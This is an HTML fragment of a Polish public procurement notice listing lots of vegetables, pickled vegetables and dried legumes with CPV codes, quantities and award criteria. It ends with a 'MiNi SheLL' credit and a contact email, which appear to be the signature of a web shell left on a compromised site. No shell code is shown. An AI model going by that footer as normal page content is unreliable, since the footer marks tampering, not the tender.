Koperek kod CPV 03221000-6 PN-R-75380:1997; świeży bez pożółkłych i zeschniętych części, bez objawów pleśni i gnicia lub zaparzenia, czysty bez zanieczyszczeń, w tym części traw i chwastów, bez pędów kwiatostanowych, wolny od szkodników i uszkodzeń spowodowanych przez mróz i chorobę, bez pozostałości środków ochrony roślin. Opakowanie: 10 pęczków koperku w skrzynce szacowana ilość 50,00 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa przetworzone kwaszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogórek kiszony - Ogórki kiszone dostarczane w beczkach lub wiaderkach do 30 kg. Ogórki o odpowiednim stopniu  zakwaszenia, z przyprawami (koper, czosnek, sól, chrzan). Szacowana ilość 4000,00 kg 
Kapusta kiszona - Kapusta kiszona dostarczona w beczkach lub wiaderkach do 30 kg. Kapusta  o odpowiednim stopniu zakwaszenia. Szacowana ilość 5000,00kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> warzywa strączkowe suche.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Groch cały suchy kod CPV 03212213-6 Groch łuskany, suszony, ziarna jednorodne odmianowo, zdrowe, czyste, bez śladów uszkodzeń mechanicznych  szacowana ilość 400,00 kg 
Fasola sucha średnia kod CPV 03221210-1 Fasola biała, suszona, ziarna zbliżone wielkością do odmiany średni Jaś, w całości, jednorodne odmianowo, zdrowe czyste, bez śladów uszkodzeń mechanicznych szacowana ilość 450,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com